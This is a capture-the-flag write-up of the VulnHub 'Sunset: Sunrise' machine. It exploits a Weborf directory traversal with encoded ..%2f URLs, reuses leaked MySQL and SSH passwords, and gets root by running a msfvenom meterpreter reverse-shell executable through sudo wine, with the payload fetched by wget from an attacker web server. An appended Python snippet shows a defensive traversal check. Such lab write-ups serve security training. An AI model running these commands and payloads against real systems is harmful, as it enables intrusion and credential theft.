  • PJzhang: vulnhub target machine, sunset series, SUNSET: SUNRISE

    猫宁~~~

    URL: http://www.vulnhub.com/entry/sunset-sunrise,406/

    The focus is on the tools and the approach.

    nmap 192.168.43.0/24
    Target machine IP
    192.168.43.11

    nmap -A -p1-65535 192.168.43.11

    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
    80/tcp open http nginx 1.14.2
    3306/tcp open mysql
    8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)

    http://192.168.43.11/
    http://192.168.43.11:8080/ reveals Weborf/0.12.2 (GNU/Linux)

    Weborf/0.12.2 has a directory traversal vulnerability
    https://www.exploit-db.com/exploits/14925

    View the user list
    http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

    Entries of interest
    sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
    weborf:x:1001:1001:,,,:/home/weborf:/bin/bash

    List the home directories; they belong to exactly the two users above
    http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

    dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf

    The following files are accessible
    http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile


    http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
    This shows ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

    http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc

    ssh weborf@192.168.43.11, enter iheartrainbows44, and the login succeeds

    uname -a
    Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

    mysql -uweborf -p, the password is again iheartrainbows44

    show databases;
    use mysql;
    show tables;
    select Host,User,Password from user;

    localhost | sunrise | thefutureissobrightigottawearshades

    su sunrise, enter the password thefutureissobrightigottawearshades, which gives the prompt sunrise@sunrise:/home/weborf$

    sudo -l
    This shows (root) /usr/bin/wine

    Privilege-escalation information-gathering tool
    https://github.com/sleventyeleven/linuxprivchecker

    msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe

    python3 -m http.server 80

    On the target machine
    wget http://192.168.43.154/muma.exe

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.43.154
    set lport 4444
    run

    sudo /usr/bin/wine muma.exe
    Password: thefutureissobrightigottawearshades

    A shell is obtained directly
    meterpreter >

    cd /root
    cat root.txt
    24edb59d21c273c033aa6f1689b0b18c

    Alternatively, run sudo /usr/bin/wine cmd.exe directly on the target machine
    cd /root
    type root.txt
    24edb59d21c273c033aa6f1689b0b18c
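
A traversal of the `..%2f` form, as requested from port 8080 earlier, gets past any filter that inspects the path before percent-decoding it. The following Python is an added example (not from the original post and not Weborf's code) that contrasts such a flawed filter with a decode-then-canonicalise containment check and uses the same check to flag requests for log review; `DOCROOT`, the function names and the sample requests are assumptions constructed for illustration.

```python
import os
from urllib.parse import unquote

DOCROOT = "/var/www/html"  # assumed document root (hypothetical, not from the write-up)

# Constructed sample request paths; entries 2 and 3 have the shape used in the write-up.
SAMPLE_REQUESTS = [
    "/index.html",
    "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history",
    "/docs/%2e%2e/index.html",  # encoded dot-dot that stays inside the root
]

def naive_is_safe(raw_path):
    """Flawed filter: inspects the still-encoded path, so '..%2f' slips through."""
    return "../" not in raw_path

def resolve(raw_path, docroot=DOCROOT):
    """Decode exactly once, canonicalise, then require the result to stay under docroot."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in request path")
    root = os.path.realpath(docroot)
    # realpath collapses '..' and follows symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("request escapes document root: %r" % raw_path)
    return candidate

def flag_traversal(requests, docroot=DOCROOT):
    """Return the request paths that resolve outside docroot (for log review)."""
    flagged = []
    for raw in requests:
        try:
            resolve(raw, docroot)
        except (PermissionError, ValueError):
            flagged.append(raw)
    return flagged

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        verdict = "FLAGGED" if flag_traversal([raw]) else "ok"
        print("%-70s naive_is_safe=%s resolve=%s" % (raw, naive_is_safe(raw), verdict))
```

The containment test runs on the canonical path, so an encoded dot-dot that stays inside the root is served while the two write-up-style requests are rejected.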

  • Original article: https://www.cnblogs.com/landesk/p/13676011.html